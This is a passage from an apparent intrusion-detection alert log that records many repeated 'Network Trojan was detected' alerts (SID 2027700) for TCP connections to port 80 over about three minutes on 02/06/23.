                          Source Port:50021
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450177802027700 02/06/23-14:18:59.607121
                          SID:2027700
                          Source Port:50177
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450269802027700 02/06/23-14:19:23.777741
                          SID:2027700
                          Source Port:50269
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449993802027700 02/06/23-14:18:09.446812
                          SID:2027700
                          Source Port:49993
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450009802027700 02/06/23-14:18:15.225597
                          SID:2027700
                          Source Port:50009
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449812802027700 02/06/23-14:17:20.620292
                          SID:2027700
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449879802027700 02/06/23-14:17:39.657688
                          SID:2027700
                          Source Port:49879
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449720802027700 02/06/23-14:16:38.844826
                          SID:2027700
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449723802027700 02/06/23-14:16:39.562180
                          SID:2027700
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449968802027700 02/06/23-14:18:03.426821
                          SID:2027700
                          Source Port:49968
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449901802027700 02/06/23-14:17:45.128471
                          SID:2027700
                          Source Port:49901
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450238802027700 02/06/23-14:19:16.271312
                          SID:2027700
                          Source Port:50238
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450149802027700 02/06/23-14:18:52.948054
                          SID:2027700
                          Source Port:50149
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449708802027700 02/06/23-14:16:33.047919
                          SID:2027700
                          Source Port:49708
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450250802027700 02/06/23-14:19:19.184250
                          SID:2027700
                          Source Port:50250
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450253802027700 02/06/23-14:19:19.903146
                          SID:2027700
                          Source Port:50253
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450161802027700 02/06/23-14:18:55.790925
                          SID:2027700
                          Source Port:50161
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449891802027700 02/06/23-14:17:42.583953
                          SID:2027700
                          Source Port:49891
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450034802027700 02/06/23-14:18:21.257214
                          SID:2027700
                          Source Port:50034
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450075802027700 02/06/23-14:18:33.288721
                          SID:2027700
                          Source Port:50075
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450164802027700 02/06/23-14:18:56.510220
                          SID:2027700
                          Source Port:50164
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449914802027700 02/06/23-14:17:48.241764
                          SID:2027700
                          Source Port:49914
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449980802027700 02/06/23-14:18:06.304828
                          SID:2027700
                          Source Port:49980
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449761802027700 02/06/23-14:17:01.580132
                          SID:2027700
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449850802027700 02/06/23-14:17:30.084700
                          SID:2027700
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450225802027700 02/06/23-14:19:13.073061
                          SID:2027700
                          Source Port:50225
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449736802027700 02/06/23-14:16:52.079670
                          SID:2027700
                          Source Port:49736
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449866802027700 02/06/23-14:17:36.501145
                          SID:2027700
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449825802027700 02/06/23-14:17:23.920192
                          SID:2027700
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449996802027700 02/06/23-14:18:10.162120
                          SID:2027700
                          Source Port:49996
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450006802027700 02/06/23-14:18:14.489864
                          SID:2027700
                          Source Port:50006
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449955802027700 02/06/23-14:18:00.317509
                          SID:2027700
                          Source Port:49955
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450136802027700 02/06/23-14:18:48.120124
                          SID:2027700
                          Source Port:50136
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449777802027700 02/06/23-14:17:05.460296
                          SID:2027700
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450266802027700 02/06/23-14:19:23.059192
                          SID:2027700
                          Source Port:50266
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450059802027700 02/06/23-14:18:27.376298
                          SID:2027700
                          Source Port:50059
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450157802027700 02/06/23-14:18:54.822506
                          SID:2027700
                          Source Port:50157
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450062802027700 02/06/23-14:18:28.208950
                          SID:2027700
                          Source Port:50062
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449829802027700 02/06/23-14:17:24.880677
                          SID:2027700
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449927802027700 02/06/23-14:17:51.554248
                          SID:2027700
                          Source Port:49927
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449832802027700 02/06/23-14:17:25.693521
                          SID:2027700
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450160802027700 02/06/23-14:18:55.547495
                          SID:2027700
                          Source Port:50160
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449734802027700 02/06/23-14:16:51.611739
                          SID:2027700
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450001802027700 02/06/23-14:18:11.711181
                          SID:2027700
                          Source Port:50001
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450255802027700 02/06/23-14:19:20.388213
                          SID:2027700
                          Source Port:50255
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449930802027700 02/06/23-14:17:53.103784
                          SID:2027700
                          Source Port:49930
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449988802027700 02/06/23-14:18:08.271366
                          SID:2027700
                          Source Port:49988
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449762802027700 02/06/23-14:17:01.814767
                          SID:2027700
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450090802027700 02/06/23-14:18:36.931058
                          SID:2027700
                          Source Port:50090
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449860802027700 02/06/23-14:17:33.773507
                          SID:2027700
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449767802027700 02/06/23-14:17:03.053144
                          SID:2027700
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450095802027700 02/06/23-14:18:38.133971
                          SID:2027700
                          Source Port:50095
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450193802027700 02/06/23-14:19:03.417591
                          SID:2027700
                          Source Port:50193
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449963802027700 02/06/23-14:18:02.243572
                          SID:2027700
                          Source Port:49963
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449804802027700 02/06/23-14:17:18.644415
                          SID:2027700
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450132802027700 02/06/23-14:18:47.164865
                          SID:2027700
                          Source Port:50132
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449770802027700 02/06/23-14:17:03.784821
                          SID:2027700
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449983802027700 02/06/23-14:18:07.033596
                          SID:2027700
                          Source Port:49983
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449692802027700 02/06/23-14:16:29.077816
                          SID:2027700
                          Source Port:49692
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450227802027700 02/06/23-14:19:13.545015
                          SID:2027700
                          Source Port:50227
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450222802027700 02/06/23-14:19:12.337102
                          SID:2027700
                          Source Port:50222
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449739802027700 02/06/23-14:16:52.782774
                          SID:2027700
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450185802027700 02/06/23-14:19:01.492596
                          SID:2027700
                          Source Port:50185
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449898802027700 02/06/23-14:17:44.411727
                          SID:2027700
                          Source Port:49898
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450104802027700 02/06/23-14:18:40.328930
                          SID:2027700
                          Source Port:50104
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449857802027700 02/06/23-14:17:31.816085
                          SID:2027700
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449893802027700 02/06/23-14:17:43.066540
                          SID:2027700
                          Source Port:49893
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449935802027700 02/06/23-14:17:55.397933
                          SID:2027700
                          Source Port:49935
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449697802027700 02/06/23-14:16:30.331432
                          SID:2027700
                          Source Port:49697
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450026802027700 02/06/23-14:18:19.334487
                          SID:2027700
                          Source Port:50026
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450067802027700 02/06/23-14:18:29.442348
                          SID:2027700
                          Source Port:50067
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450263802027700 02/06/23-14:19:22.314339
                          SID:2027700
                          Source Port:50263
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449754802027700 02/06/23-14:16:59.800602
                          SID:2027700
                          Source Port:49754
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449852802027700 02/06/23-14:17:30.586454
                          SID:2027700
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450082802027700 02/06/23-14:18:34.947434
                          SID:2027700
                          Source Port:50082
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449840802027700 02/06/23-14:17:27.625203
                          SID:2027700
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450079802027700 02/06/23-14:18:34.225155
                          SID:2027700
                          Source Port:50079
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450202802027700 02/06/23-14:19:05.591074
                          SID:2027700
                          Source Port:50202
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450018802027700 02/06/23-14:18:17.421896
                          SID:2027700
                          Source Port:50018
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450198802027700 02/06/23-14:19:04.619860
                          SID:2027700
                          Source Port:50198
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450116802027700 02/06/23-14:18:43.292412
                          SID:2027700
                          Source Port:50116
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449907802027700 02/06/23-14:17:46.566675
                          SID:2027700
                          Source Port:49907
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449787802027700 02/06/23-14:17:07.919083
                          SID:2027700
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449910802027700 02/06/23-14:17:47.301539
                          SID:2027700
                          Source Port:49910
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449782802027700 02/06/23-14:17:06.679140
                          SID:2027700
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449824802027700 02/06/23-14:17:23.678413
                          SID:2027700
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450152802027700 02/06/23-14:18:53.649179
                          SID:2027700
                          Source Port:50152
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449809802027700 02/06/23-14:17:19.879293
                          SID:2027700
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450235802027700 02/06/23-14:19:15.519092
                          SID:2027700
                          Source Port:50235
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449726802027700 02/06/23-14:16:43.296877
                          SID:2027700
                          Source Port:49726
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450054802027700 02/06/23-14:18:26.116806
                          SID:2027700
                          Source Port:50054
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450137802027700 02/06/23-14:18:48.518586
                          SID:2027700
                          Source Port:50137
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449902802027700 02/06/23-14:17:45.366776
                          SID:2027700
                          Source Port:49902
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450230802027700 02/06/23-14:19:14.260159
                          SID:2027700
                          Source Port:50230
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449865802027700 02/06/23-14:17:36.266770
                          SID:2027700
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449718802027700 02/06/23-14:16:38.360119
                          SID:2027700
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449943802027700 02/06/23-14:17:57.392402
                          SID:2027700
                          Source Port:49943
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450271802027700 02/06/23-14:19:24.244810
                          SID:2027700
                          Source Port:50271
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449790802027700 02/06/23-14:17:11.646769
                          SID:2027700
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450087802027700 02/06/23-14:18:36.155229
                          SID:2027700
                          Source Port:50087
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450129802027700 02/06/23-14:18:46.436570
                          SID:2027700
                          Source Port:50129
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450046802027700 02/06/23-14:18:24.134243
                          SID:2027700
                          Source Port:50046
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449873802027700 02/06/23-14:17:38.196581
                          SID:2027700
                          Source Port:49873
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449759802027700 02/06/23-14:17:01.035713
                          SID:2027700
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449795802027700 02/06/23-14:17:14.968804
                          SID:2027700
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449878802027700 02/06/23-14:17:39.400319
                          SID:2027700
                          Source Port:49878
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449837802027700 02/06/23-14:17:26.897782
                          SID:2027700
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450165802027700 02/06/23-14:18:56.744687
                          SID:2027700
                          Source Port:50165
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450124802027700 02/06/23-14:18:45.227691
                          SID:2027700
                          Source Port:50124
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450207802027700 02/06/23-14:19:06.819268
                          SID:2027700
                          Source Port:50207
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449722802027700 02/06/23-14:16:39.327484
                          SID:2027700
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449820802027700 02/06/23-14:17:22.659076
                          SID:2027700
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449976802027700 02/06/23-14:18:05.318607
                          SID:2027700
                          Source Port:49976
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449719802027700 02/06/23-14:16:38.598088
                          SID:2027700
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449808802027700 02/06/23-14:17:19.636621
                          SID:2027700
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449906802027700 02/06/23-14:17:46.332970
                          SID:2027700
                          Source Port:49906
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449817802027700 02/06/23-14:17:21.886400
                          SID:2027700
                          Source Port:49817
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450074802027700 02/06/23-14:18:33.054158
                          SID:2027700
                          Source Port:50074
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449915802027700 02/06/23-14:17:48.482167
                          SID:2027700
                          Source Port:49915
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450172802027700 02/06/23-14:18:58.399243
                          SID:2027700
                          Source Port:50172
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450013802027700 02/06/23-14:18:16.193101
                          SID:2027700
                          Source Port:50013
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450270802027700 02/06/23-14:19:24.011354
                          SID:2027700
                          Source Port:50270
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449948802027700 02/06/23-14:17:58.606495
                          SID:2027700
                          Source Port:49948
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450083802027700 02/06/23-14:18:35.186608
                          SID:2027700
                          Source Port:50083
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450169802027700 02/06/23-14:18:57.700716
                          SID:2027700
                          Source Port:50169
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449750802027700 02/06/23-14:16:58.814620
                          SID:2027700
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450267802027700 02/06/23-14:19:23.304554
                          SID:2027700
                          Source Port:50267
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449741802027700 02/06/23-14:16:53.261442
                          SID:2027700
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450178802027700 02/06/23-14:18:59.843880
                          SID:2027700
                          Source Port:50178
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450109802027700 02/06/23-14:18:41.581874
                          SID:2027700
                          Source Port:50109
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450103802027700 02/06/23-14:18:40.079576
                          SID:2027700
                          Source Port:50103
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450268802027700 02/06/23-14:19:23.543087
                          SID:2027700
                          Source Port:50268
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449779802027700 02/06/23-14:17:05.941638
                          SID:2027700
                          Source Port:49779
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449934802027700 02/06/23-14:17:55.067276
                          SID:2027700
                          Source Port:49934
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449738802027700 02/06/23-14:16:52.550399
                          SID:2027700
                          Source Port:49738
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450014802027700 02/06/23-14:18:16.436544
                          SID:2027700
                          Source Port:50014
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449975802027700 02/06/23-14:18:05.084398
                          SID:2027700
                          Source Port:49975
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450210802027700 02/06/23-14:19:07.790071
                          SID:2027700
                          Source Port:50210
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450055802027700 02/06/23-14:18:26.352553
                          SID:2027700
                          Source Port:50055
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450144802027700 02/06/23-14:18:51.746609
                          SID:2027700
                          Source Port:50144
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450181802027700 02/06/23-14:19:00.557837
                          SID:2027700
                          Source Port:50181
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449721802027700 02/06/23-14:16:39.081762
                          SID:2027700
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449886802027700 02/06/23-14:17:41.361243
                          SID:2027700
                          Source Port:49886
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449845802027700 02/06/23-14:17:28.815135
                          SID:2027700
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450251802027700 02/06/23-14:19:19.419157
                          SID:2027700
                          Source Port:50251
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450197802027700 02/06/23-14:19:04.369823
                          SID:2027700
                          Source Port:50197
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450239802027700 02/06/23-14:19:16.511065
                          SID:2027700
                          Source Port:50239
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449811802027700 02/06/23-14:17:20.370369
                          SID:2027700
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449947802027700 02/06/23-14:17:58.363275
                          SID:2027700
                          Source Port:49947
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450214802027700 02/06/23-14:19:10.427528
                          SID:2027700
                          Source Port:50214
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450128802027700 02/06/23-14:18:46.183273
                          SID:2027700
                          Source Port:50128
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450125802027700 02/06/23-14:18:45.461673
                          SID:2027700
                          Source Port:50125
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
